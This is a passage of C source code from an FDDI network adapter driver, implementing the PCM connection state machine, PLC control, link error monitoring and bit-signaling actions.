outpw(PLC(np,PL_XMIT_VECTOR),n) ;
#ifdef DEBUG
#if 1
#ifdef DEBUG_BRD
if (smc->debug.d_plc & 0x80)
#else
if (debug.d_plc & 0x80)
#endif
printf("SIGNALING bit %d .. %d\n",phy->bitn,phy->bitn+len-1) ;
#endif
#endif
return 0;
}
/*
* config plc muxes
*/
void plc_config_mux(struct s_smc *smc, int mux)
{
if (smc->s.sas != SMT_DAS)
return ;
if (mux == MUX_WRAPB) {
SETMASK(PLC(PA,PL_CNTRL_B),PL_CONFIG_CNTRL,PL_CONFIG_CNTRL) ;
SETMASK(PLC(PA,PL_CNTRL_A),PL_SC_REM_LOOP,PL_SC_REM_LOOP) ;
}
else {
CLEAR(PLC(PA,PL_CNTRL_B),PL_CONFIG_CNTRL) ;
CLEAR(PLC(PA,PL_CNTRL_A),PL_SC_REM_LOOP) ;
}
CLEAR(PLC(PB,PL_CNTRL_B),PL_CONFIG_CNTRL) ;
CLEAR(PLC(PB,PL_CNTRL_A),PL_SC_REM_LOOP) ;
}
/*
PCM state machine
called by dispatcher & fddi_init() (driver)
do
display state change
process event
until SM is stable
*/
void pcm(struct s_smc *smc, const int np, int event)
{
int state ;
int oldstate ;
struct s_phy *phy ;
struct fddi_mib_p *mib ;
#ifndef CONCENTRATOR
/*
* ignore 2nd PHY if SAS
*/
if ((np != PS) && (smc->s.sas == SMT_SAS))
return ;
#endif
phy = &smc->y[np] ;
mib = phy->mib ;
oldstate = mib->fddiPORTPCMState ;
do {
DB_PCM("PCM %c: state %s%s, event %s",
phy->phy_name,
mib->fddiPORTPCMState & AFLAG ? "ACTIONS " : "",
pcm_states[mib->fddiPORTPCMState & ~AFLAG],
pcm_events[event]);
state = mib->fddiPORTPCMState ;
pcm_fsm(smc,phy,event) ;
event = 0 ;
} while (state != mib->fddiPORTPCMState) ;
/*
* because the PLC does the bit signaling for us,
* we're always in SIGNAL state
* the MIB want's to see CONNECT
* we therefore fake an entry in the MIB
*/
if (state == PC5_SIGNAL)
mib->fddiPORTPCMStateX = PC3_CONNECT ;
else
mib->fddiPORTPCMStateX = state ;
#ifndef SLIM_SMT
/*
* path change
*/
if ( mib->fddiPORTPCMState != oldstate &&
((oldstate == PC8_ACTIVE) || (mib->fddiPORTPCMState == PC8_ACTIVE))) {
smt_srf_event(smc,SMT_EVENT_PORT_PATH_CHANGE,
(int) (INDEX_PORT+ phy->np),0) ;
}
#endif
#ifdef FDDI_MIB
/* check whether a snmp-trap has to be sent */
if ( mib->fddiPORTPCMState != oldstate ) {
/* a real state change took place */
DB_SNMP ("PCM from %d to %d\n", oldstate, mib->fddiPORTPCMState);
if ( mib->fddiPORTPCMState == PC0_OFF ) {
/* send first trap */
snmp_fddi_trap (smc, 1, (int) mib->fddiPORTIndex );
} else if ( oldstate == PC0_OFF ) {
/* send second trap */
snmp_fddi_trap (smc, 2, (int) mib->fddiPORTIndex );
} else if ( mib->fddiPORTPCMState != PC2_TRACE &&
oldstate == PC8_ACTIVE ) {
/* send third trap */
snmp_fddi_trap (smc, 3, (int) mib->fddiPORTIndex );
} else if ( mib->fddiPORTPCMState == PC8_ACTIVE ) {
/* send fourth trap */
snmp_fddi_trap (smc, 4, (int) mib->fddiPORTIndex );
}
}
#endif
pcm_state_change(smc,np,state) ;
}
/*
* PCM state machine
*/
static void pcm_fsm(struct s_smc *smc, struct s_phy *phy, int cmd)
{
int i ;
int np = phy->np ; /* PHY index */
struct s_plc *plc ;
struct fddi_mib_p *mib ;
#ifndef MOT_ELM
u_short plc_rev ; /* Revision of the plc */
#endif /* nMOT_ELM */
plc = &phy->plc ;
mib = phy->mib ;
/*
* general transitions independent of state
*/
switch (cmd) {
case PC_STOP :
/*PC00-PC80*/
if (mib->fddiPORTPCMState != PC9_MAINT) {
GO_STATE(PC0_OFF) ;
AIX_EVENT(smc, (u_long) FDDI_RING_STATUS, (u_long)
FDDI_PORT_EVENT, (u_long) FDDI_PORT_STOP,
smt_get_port_event_word(smc));
}
return ;
case PC_START :
/*PC01-PC81*/
if (mib->fddiPORTPCMState != PC9_MAINT)
GO_STATE(PC1_BREAK) ;
return ;
case PC_DISABLE :
/* PC09-PC99 */
GO_STATE(PC9_MAINT) ;
AIX_EVENT(smc, (u_long) FDDI_RING_STATUS, (u_long)
FDDI_PORT_EVENT, (u_long) FDDI_PORT_DISABLED,
smt_get_port_event_word(smc));
return ;
case PC_TIMEOUT_LCT :
/* if long or extended LCT */
stop_pcm_timer0(smc,phy) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
/* end of LCT is indicate by PCM_CODE (initiate PCM event) */
return ;
}
switch(mib->fddiPORTPCMState) {
case ACTIONS(PC0_OFF) :
stop_pcm_timer0(smc,phy) ;
outpw(PLC(np,PL_CNTRL_A),0) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_PC_JOIN) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
sm_ph_lem_stop(smc,np) ; /* disable LEM */
phy->cf_loop = FALSE ;
phy->cf_join = FALSE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
plc_go_state(smc,np,PL_PCM_STOP) ;
mib->fddiPORTConnectState = PCM_DISABLED ;
ACTIONS_DONE() ;
break ;
case PC0_OFF:
/*PC09*/
if (cmd == PC_MAINT) {
GO_STATE(PC9_MAINT) ;
break ;
}
break ;
case ACTIONS(PC1_BREAK) :
/* Stop the LCT timer if we came from Signal state */
stop_pcm_timer0(smc,phy) ;
ACTIONS_DONE() ;
plc_go_state(smc,np,0) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_PC_JOIN) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
sm_ph_lem_stop(smc,np) ; /* disable LEM */
/*
* if vector is already loaded, go to OFF to clear PCM_SIGNAL
*/
#if 0
if (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL) {
plc_go_state(smc,np,PL_PCM_STOP) ;
/* TB_MIN ? */
}
#endif
/*
* Go to OFF state in any case.
*/
plc_go_state(smc,np,PL_PCM_STOP) ;
if (mib->fddiPORTPC_Withhold == PC_WH_NONE)
mib->fddiPORTConnectState = PCM_CONNECTING ;
phy->cf_loop = FALSE ;
phy->cf_join = FALSE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
phy->ls_flag = FALSE ;
phy->pc_mode = PM_NONE ; /* needed by CFM */
phy->bitn = 0 ; /* bit signaling start bit */
for (i = 0 ; i < 3 ; i++)
pc_tcode_actions(smc,i,phy) ;
/* Set the non-active interrupt mask register */
outpw(PLC(np,PL_INTR_MASK),plc_imsk_na) ;
/*
* If the LCT was stopped. There might be a
* PCM_CODE interrupt event present.
* This must be cleared.
*/
(void)inpw(PLC(np,PL_INTR_EVENT)) ;
#ifndef MOT_ELM
/* Get the plc revision for revision dependent code */
plc_rev = inpw(PLC(np,PL_STATUS_A)) & PLC_REV_MASK ;
if (plc_rev != PLC_REV_SN3)
#endif /* MOT_ELM */
{
/*
* No supernet III PLC, so set Xmit verctor and
* length BEFORE starting the state machine.
*/
if (plc_send_bits(smc,phy,3)) {
return ;
}
}
/*
* Now give the Start command.
* - The start command shall be done before setting the bits
* to be signaled. (In PLC-S description and PLCS in SN3.
* - The start command shall be issued AFTER setting the
* XMIT vector and the XMIT length register.
*
* We do it exactly according this specs for the old PLC and
* the new PLCS inside the SN3.
* For the usual PLCS we try it the way it is done for the
* old PLC and set the XMIT registers again, if the PLC is
* not in SIGNAL state. This is done according to an PLCS
* errata workaround.
*/
plc_go_state(smc,np,PL_PCM_START) ;
/*
* workaround for PLC-S eng. sample errata
*/
#ifdef MOT_ELM
if (!(inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL))
#else /* nMOT_ELM */
if (((inpw(PLC(np,PL_STATUS_A)) & PLC_REV_MASK) !=
PLC_REVISION_A) &&
!(inpw(PLC(np,PL_STATUS_B)) & PL_PCM_SIGNAL))
#endif /* nMOT_ELM */
{
/*
* Set register again (PLCS errata) or the first time
* (new SN3 PLCS).
*/
(void) plc_send_bits(smc,phy,3) ;
}
/*
* end of workaround
*/
GO_STATE(PC5_SIGNAL) ;
plc->p_state = PS_BIT3 ;
plc->p_bits = 3 ;
plc->p_start = 0 ;
break ;
case PC1_BREAK :
break ;
case ACTIONS(PC2_TRACE) :
plc_go_state(smc,np,PL_PCM_TRACE) ;
ACTIONS_DONE() ;
break ;
case PC2_TRACE :
break ;
case PC3_CONNECT : /* these states are done by hardware */
case PC4_NEXT :
break ;
case ACTIONS(PC5_SIGNAL) :
ACTIONS_DONE() ;
case PC5_SIGNAL :
if ((cmd != PC_SIGNAL) && (cmd != PC_TIMEOUT_LCT))
break ;
switch (plc->p_state) {
case PS_BIT3 :
for (i = 0 ; i <= 2 ; i++)
pc_rcode_actions(smc,i,phy) ;
pc_tcode_actions(smc,3,phy) ;
plc->p_state = PS_BIT4 ;
plc->p_bits = 1 ;
plc->p_start = 3 ;
phy->bitn = 3 ;
if (plc_send_bits(smc,phy,1)) {
return ;
}
break ;
case PS_BIT4 :
pc_rcode_actions(smc,3,phy) ;
for (i = 4 ; i <= 6 ; i++)
pc_tcode_actions(smc,i,phy) ;
plc->p_state = PS_BIT7 ;
plc->p_bits = 3 ;
plc->p_start = 4 ;
phy->bitn = 4 ;
if (plc_send_bits(smc,phy,3)) {
return ;
}
break ;
case PS_BIT7 :
for (i = 3 ; i <= 6 ; i++)
pc_rcode_actions(smc,i,phy) ;
plc->p_state = PS_LCT ;
plc->p_bits = 0 ;
plc->p_start = 7 ;
phy->bitn = 7 ;
sm_ph_lem_start(smc,np,(int)smc->s.lct_short) ; /* enable LEM */
/* start LCT */
i = inpw(PLC(np,PL_CNTRL_B)) & ~PL_PC_LOOP ;
outpw(PLC(np,PL_CNTRL_B),i) ; /* must be cleared */
outpw(PLC(np,PL_CNTRL_B),i | PL_RLBP) ;
break ;
case PS_LCT :
/* check for local LCT failure */
pc_tcode_actions(smc,7,phy) ;
/*
* set tval[7]
*/
plc->p_state = PS_BIT8 ;
plc->p_bits = 1 ;
plc->p_start = 7 ;
phy->bitn = 7 ;
if (plc_send_bits(smc,phy,1)) {
return ;
}
break ;
case PS_BIT8 :
/* check for remote LCT failure */
pc_rcode_actions(smc,7,phy) ;
if (phy->t_val[7] || phy->r_val[7]) {
plc_go_state(smc,np,PL_PCM_STOP) ;
GO_STATE(PC1_BREAK) ;
break ;
}
for (i = 8 ; i <= 9 ; i++)
pc_tcode_actions(smc,i,phy) ;
plc->p_state = PS_JOIN ;
plc->p_bits = 2 ;
plc->p_start = 8 ;
phy->bitn = 8 ;
if (plc_send_bits(smc,phy,2)) {
return ;
}
break ;
case PS_JOIN :
for (i = 8 ; i <= 9 ; i++)
pc_rcode_actions(smc,i,phy) ;
plc->p_state = PS_ACTIVE ;
GO_STATE(PC6_JOIN) ;
break ;
}
break ;
case ACTIONS(PC6_JOIN) :
/*
* prevent mux error when going from WRAP_A to WRAP_B
*/
if (smc->s.sas == SMT_DAS && np == PB &&
(smc->y[PA].pc_mode == PM_TREE ||
smc->y[PB].pc_mode == PM_TREE)) {
SETMASK(PLC(np,PL_CNTRL_A),
PL_SC_REM_LOOP,PL_SC_REM_LOOP) ;
SETMASK(PLC(np,PL_CNTRL_B),
PL_CONFIG_CNTRL,PL_CONFIG_CNTRL) ;
}
SETMASK(PLC(np,PL_CNTRL_B),PL_PC_JOIN,PL_PC_JOIN) ;
SETMASK(PLC(np,PL_CNTRL_B),PL_PC_JOIN,PL_PC_JOIN) ;
ACTIONS_DONE() ;
cmd = 0 ;
/* fall thru */
case PC6_JOIN :
switch (plc->p_state) {
case PS_ACTIVE:
/*PC88b*/
if (!phy->cf_join) {
phy->cf_join = TRUE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
}
if (cmd == PC_JOIN)
GO_STATE(PC8_ACTIVE) ;
/*PC82*/
if (cmd == PC_TRACE) {
GO_STATE(PC2_TRACE) ;
break ;
}
break ;
}
break ;
case PC7_VERIFY :
break ;
case ACTIONS(PC8_ACTIVE) :
/*
* start LEM for SMT
*/
sm_ph_lem_start(smc,(int)phy->np,LCT_LEM_MAX) ;
phy->tr_flag = FALSE ;
mib->fddiPORTConnectState = PCM_ACTIVE ;
/* Set the active interrupt mask register */
outpw(PLC(np,PL_INTR_MASK),plc_imsk_act) ;
ACTIONS_DONE() ;
break ;
case PC8_ACTIVE :
/*PC81 is done by PL_TNE_EXPIRED irq */
/*PC82*/
if (cmd == PC_TRACE) {
GO_STATE(PC2_TRACE) ;
break ;
}
/*PC88c: is done by TRACE_PROP irq */
break ;
case ACTIONS(PC9_MAINT) :
stop_pcm_timer0(smc,phy) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_PC_JOIN) ;
CLEAR(PLC(np,PL_CNTRL_B),PL_LONG) ;
CLEAR(PLC(np,PL_INTR_MASK),PL_LE_CTR) ; /* disable LEM int. */
sm_ph_lem_stop(smc,np) ; /* disable LEM */
phy->cf_loop = FALSE ;
phy->cf_join = FALSE ;
queue_event(smc,EVENT_CFM,CF_JOIN+np) ;
plc_go_state(smc,np,PL_PCM_STOP) ;
mib->fddiPORTConnectState = PCM_DISABLED ;
SETMASK(PLC(np,PL_CNTRL_B),PL_MAINT,PL_MAINT) ;
sm_ph_linestate(smc,np,(int) MIB2LS(mib->fddiPORTMaint_LS)) ;
outpw(PLC(np,PL_CNTRL_A),PL_SC_BYPASS) ;
ACTIONS_DONE() ;
break ;
case PC9_MAINT :
DB_PCMN(1, "PCM %c : MAINT", phy->phy_name);
/*PC90*/
if (cmd == PC_ENABLE) {
GO_STATE(PC0_OFF) ;
break ;
}
break ;
default:
SMT_PANIC(smc,SMT_E0118, SMT_E0118_MSG) ;
break ;
}
}
/*
* force line state on a PHY output (only in MAINT state)
*/
static void sm_ph_linestate(struct s_smc *smc, int phy, int ls)
{
int cntrl ;
SK_UNUSED(smc) ;
cntrl = (inpw(PLC(phy,PL_CNTRL_B)) & ~PL_MAINT_LS) |
PL_PCM_STOP | PL_MAINT ;
switch(ls) {
case PC_QLS: /* Force Quiet */
cntrl |= PL_M_QUI0 ;
break ;
case PC_MLS: /* Force Master */
cntrl |= PL_M_MASTR ;
break ;
case PC_HLS: /* Force Halt */
cntrl |= PL_M_HALT ;
break ;
default :
case PC_ILS: /* Force Idle */
cntrl |= PL_M_IDLE ;
break ;
case PC_LS_PDR: /* Enable repeat filter */
cntrl |= PL_M_TPDR ;
break ;
}
outpw(PLC(phy,PL_CNTRL_B),cntrl) ;
}
static void reset_lem_struct(struct s_phy *phy)
{
struct lem_counter *lem = &phy->lem ;
phy->mib->fddiPORTLer_Estimate = 15 ;
lem->lem_float_ber = 15 * 100 ;
}
/*
* link error monitor
*/
static void lem_evaluate(struct s_smc *smc, struct s_phy *phy)
{
int ber ;
u_long errors ;
struct lem_counter *lem = &phy->lem ;
struct fddi_mib_p *mib ;
int cond ;
mib = phy->mib ;
if (!lem->lem_on)
return ;
errors = inpw(PLC(((int) phy->np),PL_LINK_ERR_CTR)) ;
lem->lem_errors += errors ;
mib->fddiPORTLem_Ct += errors ;
errors = lem->lem_errors ;
/*
* calculation is called on a intervall of 8 seconds
* -> this means, that one error in 8 sec. is one of 8*125*10E6
* the same as BER = 10E-9
* Please note:
* -> 9 errors in 8 seconds mean:
* BER = 9 * 10E-9 and this is
* < 10E-8, so the limit of 10E-8 is not reached!
*/
if (!errors) ber = 15 ;
else if (errors <= 9) ber = 9 ;
else if (errors <= 99) ber = 8 ;
else if (errors <= 999) ber = 7 ;
else if (errors <= 9999) ber = 6 ;
else if (errors <= 99999) ber = 5 ;
else if (errors <= 999999) ber = 4 ;
else if (errors <= 9999999) ber = 3 ;
else if (errors <= 99999999) ber = 2 ;
else if (errors <= 999999999) ber = 1 ;
else ber = 0 ;
/*
* weighted average
*/
ber *= 100 ;
lem->lem_float_ber = lem->lem_float_ber * 7 + ber * 3 ;
lem->lem_float_ber /= 10 ;
mib->fddiPORTLer_Estimate = lem->lem_float_ber / 100 ;
if (mib->fddiPORTLer_Estimate < 4) {
mib->fddiPORTLer_Estimate = 4 ;
}
if (lem->lem_errors) {
DB_PCMN(1, "LEM %c :", phy->np == PB ? 'B' : 'A');
DB_PCMN(1, "errors : %ld", lem->lem_errors);
DB_PCMN(1, "sum_errors : %ld", mib->fddiPORTLem_Ct);
DB_PCMN(1, "current BER : 10E-%d", ber / 100);
DB_PCMN(1, "float BER : 10E-(%d/100)", lem->lem_float_ber);
DB_PCMN(1, "avg. BER : 10E-%d", mib->fddiPORTLer_Estimate);
}
lem->lem_errors = 0L ;
#ifndef SLIM_SMT
cond = (mib->fddiPORTLer_Estimate <= mib->fddiPORTLer_Alarm) ?
TRUE : FALSE ;
#ifdef SMT_EXT_CUTOFF
smt_ler_alarm_check(smc,phy,cond) ;
#endif /* nSMT_EXT_CUTOFF */
if (cond != mib->fddiPORTLerFlag) {
smt_srf_event(smc,SMT_COND_PORT_LER,
(int) (INDEX_PORT+ phy->np) ,cond) ;
}
#endif
if ( mib->fddiPORTLer_Estimate <= mib->fddiPORTLer_Cutoff) {
phy->pc_lem_fail = TRUE ; /* flag */
mib->fddiPORTLem_Reject_Ct++ ;
/*
* "forgive 10e-2" if we cutoff so we can come
* up again ..
*/
lem->lem_float_ber += 2*100 ;
/*PC81b*/
#ifdef CONCENTRATOR
DB_PCMN(1, "PCM: LER cutoff on port %d cutoff %d",
phy->np, mib->fddiPORTLer_Cutoff);
#endif
#ifdef SMT_EXT_CUTOFF
smt_port_off_event(smc,phy->np);
#else /* nSMT_EXT_CUTOFF */
queue_event(smc,(int)(EVENT_PCM+phy->np),PC_START) ;
#endif /* nSMT_EXT_CUTOFF */
}
}
/*
* called by SMT to calculate LEM bit error rate
*/
void sm_lem_evaluate(struct s_smc *smc)
{
int np ;
for (np = 0 ; np < NUMPHYS ; np++)
lem_evaluate(smc,&smc->y[np]) ;
}
static void lem_check_lct(struct s_smc *smc, struct s_phy *phy)
{
struct lem_counter *lem = &phy->lem ;
struct fddi_mib_p *mib ;
int errors ;
mib = phy->mib ;
phy->pc_lem_fail = FALSE ; /* flag */
errors = inpw(PLC(((int)phy->np),PL_LINK_ERR_CTR)) ;
lem->lem_errors += errors ;
mib->fddiPORTLem_Ct += errors ;
if (lem->lem_errors) {
switch(phy->lc_test) {
case LC_SHORT:
if (lem->lem_errors >= smc->s.lct_short)
phy->pc_lem_fail = TRUE ;
break ;
case LC_MEDIUM:
if (lem->lem_errors >= smc->s.lct_medium)
phy->pc_lem_fail = TRUE ;
break ;
case LC_LONG:
if (lem->lem_errors >= smc->s.lct_long)
phy->pc_lem_fail = TRUE ;
break ;
case LC_EXTENDED:
if (lem->lem_errors >= smc->s.lct_extended)
phy->pc_lem_fail = TRUE ;
break ;
}
DB_PCMN(1, " >>errors : %lu", lem->lem_errors);
}
if (phy->pc_lem_fail) {
mib->fddiPORTLCTFail_Ct++ ;
mib->fddiPORTLem_Reject_Ct++ ;
}
else
mib->fddiPORTLCTFail_Ct = 0 ;
}
/*
* LEM functions
*/
static void sm_ph_lem_start(struct s_smc *smc, int np, int threshold)
{
struct lem_counter *lem = &smc->y[np].lem ;
lem->lem_on = 1 ;
lem->lem_errors = 0L ;
/* Do NOT reset mib->fddiPORTLer_Estimate here. It is called too
* often.
*/
outpw(PLC(np,PL_LE_THRESHOLD),threshold) ;
(void)inpw(PLC(np,PL_LINK_ERR_CTR)) ; /* clear error counter */
/* enable LE INT */
SETMASK(PLC(np,PL_INTR_MASK),PL_LE_CTR,PL_LE_CTR) ;
}
static void sm_ph_lem_stop(struct s_smc *smc, int np)
{
struct lem_counter *lem = &smc->y[np].lem ;
lem->lem_on = 0 ;
CLEAR(PLC(np,PL_INTR_MASK),PL_LE_CTR) ;
}
/* ARGSUSED */
void sm_pm_ls_latch(struct s_smc *smc, int phy, int on_off)
/* int on_off; en- or disable ident. ls */
{
SK_UNUSED(smc) ;
phy = phy ; on_off = on_off ;
}
/*
* PCM pseudo code
* receive actions are called AFTER the bit n is received,
* i.e. if pc_rcode_actions(5) is called, bit 6 is the next bit to be received
*/
/*
* PCM pseudo code 5.1 .. 6.1
*/
static void pc_rcode_actions(struct s_smc *smc, int bit, struct s_phy *phy)
{
struct fddi_mib_p *mib ;
mib = phy->mib ;
DB_PCMN(1, "SIG rec %x %x:", bit, phy->r_val[bit]);
bit++ ;
switch(bit) {
case 0:
case 1:
case 2:
break ;
case 3 :
if (phy->r_val[1] == 0 && phy->r_val[2] == 0)
mib->fddiPORTNeighborType = TA ;
else if (phy->r_val[1] == 0 && phy->r_val[2] == 1)
mib->fddiPORTNeighborType = TB ;
else if (phy->r_val[1] == 1 && phy->r_val[2] == 0)
mib->fddiPORTNeighborType = TS ;
else if (phy->r_val[1] == 1 && phy->r_val[2] == 1)
mib->fddiPORTNeighborType = TM ;
break ;
case 4:
if (mib->fddiPORTMy_Type == TM &&
mib->fddiPORTNeighborType == TM) {
DB_PCMN(1, "PCM %c : E100 withhold M-M",
phy->phy_name);
mib->fddiPORTPC_Withhold = PC_WH_M_M ;
RS_SET(smc,RS_EVENT) ;
}
else if (phy->t_val[3] || phy->r_val[3]) {
mib->fddiPORTPC_Withhold = PC_WH_NONE ;
if (mib->fddiPORTMy_Type == TM ||
mib->fddiPORTNeighborType == TM)
phy->pc_mode = PM_TREE ;
else
phy->pc_mode = PM_PEER ;
/* reevaluate the selection criteria (wc_flag) */
all_selection_criteria (smc);
if (phy->wc_flag) {
mib->fddiPORTPC_Withhold = PC_WH_PATH ;
}
}
else {
mib->fddiPORTPC_Withhold = PC_WH_OTHER ;
RS_SET(smc,RS_EVENT) ;
DB_PCMN(1, "PCM %c : E101 withhold other",
phy->phy_name);
}
phy->twisted = ((mib->fddiPORTMy_Type != TS) &&
(mib->fddiPORTMy_Type != TM) &&
(mib->fddiPORTNeighborType ==
mib->fddiPORTMy_Type)) ;
if (phy->twisted) {
DB_PCMN(1, "PCM %c : E102 !!! TWISTED !!!",
phy->phy_name);
}
break ;
case 5 :
break ;
case 6:
if (phy->t_val[4] || phy->r_val[4]) {
if ((phy->t_val[4] && phy->t_val[5]) ||
(phy->r_val[4] && phy->r_val[5]) )
phy->lc_test = LC_EXTENDED ;
else
phy->lc_test = LC_LONG ;
}
else if (phy->t_val[5] || phy->r_val[5])
phy->lc_test = LC_MEDIUM ;
else
phy->lc_test = LC_SHORT ;
switch (phy->lc_test) {
case LC_SHORT : /* 50ms */
outpw(PLC((int)phy->np,PL_LC_LENGTH), TP_LC_LENGTH ) ;
phy->t_next[7] = smc->s.pcm_lc_short ;
break ;
case LC_MEDIUM : /* 500ms */
outpw(PLC((int)phy->np,PL_LC_LENGTH), TP_LC_LONGLN ) ;
phy->t_next[7] = smc->s.pcm_lc_medium ;
break ;
case LC_LONG :
SETMASK(PLC((int)phy->np,PL_CNTRL_B),PL_LONG,PL_LONG) ;
phy->t_next[7] = smc->s.pcm_lc_long ;
break ;
case LC_EXTENDED :
SETMASK(PLC((int)phy->np,PL_CNTRL_B),PL_LONG,PL_LONG) ;
phy->t_next[7] = smc->s.pcm_lc_extended ;
break ;
}
if (phy->t_next[7] > smc->s.pcm_lc_medium) {
start_pcm_timer0(smc,phy->t_next[7],PC_TIMEOUT_LCT,phy);
}
DB_PCMN(1, "LCT timer = %ld us", phy->t_next[7]);
phy->t_next[9] = smc->s.pcm_t_next_9 ;
break ;
case 7:
if (phy->t_val[6]) {
phy->cf_loop = TRUE ;
}
phy->td_flag = TRUE ;
break ;
case 8:
if (phy->t_val[7] || phy->r_val[7]) {
DB_PCMN(1, "PCM %c : E103 LCT fail %s",
phy->phy_name,
phy->t_val[7] ? "local" : "remote");
queue_event(smc,(int)(EVENT_PCM+phy->np),PC_START) ;
}
break ;
case 9:
if (phy->t_val[8] || phy->r_val[8]) {
if (phy->t_val[8])
phy->cf_loop = TRUE ;
phy->td_flag = TRUE ;
}
break ;
case 10:
if (phy->r_val[9]) {
/* neighbor intends to have MAC on output */ ;
mib->fddiPORTMacIndicated.R_val = TRUE ;
}
else {
/* neighbor does not intend to have MAC on output */ ;
mib->fddiPORTMacIndicated.R_val = FALSE ;
}
break ;
}
}
/*
* PCM pseudo code 5.1 .. 6.1
*/
static void pc_tcode_actions(struct s_smc *smc, const int bit, struct s_phy *phy)
{
int np = phy->np ;
struct fddi_mib_p *mib ;
mib = phy->mib ;
switch(bit) {
case 0:
phy->t_val[0] = 0 ; /* no escape used */
break ;
case 1:
if (mib->fddiPORTMy_Type == TS || mib->fddiPORTMy_Type == TM)
phy->t_val[1] = 1 ;
else
phy->t_val[1] = 0 ;
break ;
case 2 :
if (mib->fddiPORTMy_Type == TB || mib->fddiPORTMy_Type == TM)
phy->t_val[2] = 1 ;
else
phy->t_val[2] = 0 ;
break ;
case 3:
{
int type,ne ;
int policy ;
type = mib->fddiPORTMy_Type ;
ne = mib->fddiPORTNeighborType ;
policy = smc->mib.fddiSMTConnectionPolicy ;
phy->t_val[3] = 1 ; /* Accept connection */
switch (type) {
case TA :
if (
((policy & POLICY_AA) && ne == TA) ||
((policy & POLICY_AB) && ne == TB) ||
((policy & POLICY_AS) && ne == TS) ||
((policy & POLICY_AM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
case TB :
if (
((policy & POLICY_BA) && ne == TA) ||
((policy & POLICY_BB) && ne == TB) ||
((policy & POLICY_BS) && ne == TS) ||
((policy & POLICY_BM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
case TS :
if (
((policy & POLICY_SA) && ne == TA) ||
((policy & POLICY_SB) && ne == TB) ||
((policy & POLICY_SS) && ne == TS) ||
((policy & POLICY_SM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
case TM :
if ( ne == TM ||
((policy & POLICY_MA) && ne == TA) ||
((policy & POLICY_MB) && ne == TB) ||
((policy & POLICY_MS) && ne == TS) ||
((policy & POLICY_MM) && ne == TM) )
phy->t_val[3] = 0 ; /* Reject */
break ;
}
#ifndef SLIM_SMT
/*
* detect undesirable connection attempt event
*/
if ( (type == TA && ne == TA ) ||
(type == TA && ne == TS ) ||
(type == TB && ne == TB ) ||
(type == TB && ne == TS ) ||
(type == TS && ne == TA ) ||
(type == TS && ne == TB ) ) {
smt_srf_event(smc,SMT_EVENT_PORT_CONNECTION,
(int) (INDEX_PORT+ phy->np) ,0) ;
}
#endif
}
break ;
case 4:
if (mib->fddiPORTPC_Withhold == PC_WH_NONE) {
if (phy->pc_lem_fail) {
phy->t_val[4] = 1 ; /* long */
phy->t_val[5] = 0 ;
}
else {
phy->t_val[4] = 0 ;
if (mib->fddiPORTLCTFail_Ct > 0)
phy->t_val[5] = 1 ; /* medium */
else
phy->t_val[5] = 0 ; /* short */
/*
* Implementers choice: use medium
* instead of short when undesired
* connection attempt is made.
*/
if (phy->wc_flag)
phy->t_val[5] = 1 ; /* medium */
}
mib->fddiPORTConnectState = PCM_CONNECTING ;
}
else {
mib->fddiPORTConnectState = PCM_STANDBY ;
phy->t_val[4] = 1 ; /* extended */
phy->t_val[5] = 1 ;
}
break ;
case 5:
break ;
case 6:
/* we do NOT have a MAC for LCT */
phy->t_val[6] = 0 ;
break ;
case 7:
phy->cf_loop = FALSE ;
lem_check_lct(smc,phy) ;
if (phy->pc_lem_fail) {
DB_PCMN(1, "PCM %c : E104 LCT failed", phy->phy_name);
phy->t_val[7] = 1 ;
}
else
phy->t_val[7] = 0 ;
break ;
case 8:
phy->t_val[8] = 0 ; /* Don't request MAC loopback */
break ;
case 9:
phy->cf_loop = 0 ;
if ((mib->fddiPORTPC_Withhold != PC_WH_NONE) ||
((smc->s.sas == SMT_DAS) && (phy->wc_flag))) {
queue_event(smc,EVENT_PCM+np,PC_START) ;
break ;
}
phy->t_val[9] = FALSE ;
switch (smc->s.sas) {
case SMT_DAS :
/*
* MAC intended on output
*/
if (phy->pc_mode == PM_TREE) {
if ((np == PB) || ((np == PA) &&
(smc->y[PB].mib->fddiPORTConnectState !=
PCM_ACTIVE)))
phy->t_val[9] = TRUE ;
}
else {
if (np == PB)
phy->t_val[9] = TRUE ;
}
break ;
case SMT_SAS :
if (np == PS)
phy->t_val[9] = TRUE ;
break ;
#ifdef CONCENTRATOR
case SMT_NAC :
/*
* MAC intended on output
*/
if (np == PB)
phy->t_val[9] = TRUE ;
break ;
#endif
}
mib->fddiPORTMacIndicated.T_val = phy->t_val[9] ;
break ;
}
DB_PCMN(1, "SIG snd %x %x:", bit, phy->t_val[bit]);
}
/*
* return status twisted (called by SMT)
*/
int pcm_status_twisted(struct s_smc *smc)
{
int twist = 0 ;
if (smc->s.sas != SMT_DAS)
return 0;
if (smc->y[PA].twisted && (smc->y[PA].mib->fddiPORTPCMState == PC8_ACTIVE))
twist |= 1 ;
if (smc->y[PB].twisted && (smc->y[PB].mib->fddiPORTPCMState == PC8_ACTIVE))
twist |= 2 ;
return twist;
}
/*
* return status (called by SMT)
* type
* state
* remote phy type
* remote mac yes/no
*/
void pcm_status_state(struct s_smc *smc, int np, int *type, int *state,
int *remote, int *mac)
{
struct s_phy *phy = &smc->y[np] ;
struct fddi_mib_p *mib ;
mib = phy->mib ;
/* remote PHY type and MAC - set only if active */
*mac = 0 ;
*type = mib->fddiPORTMy_Type ; /* our PHY type */
*state = mib->fddiPORTConnectState ;
*remote = mib->fddiPORTNeighborType ;
switch(mib->fddiPORTPCMState) {
case PC8_ACTIVE :
*mac = mib->fddiPORTMacIndicated.R_val ;
break ;
}
}
/*
* return rooted station status (called by SMT)
*/
int pcm_rooted_station(struct s_smc *smc)
{
int n ;
for (n = 0 ; n < NUMPHYS ; n++) {
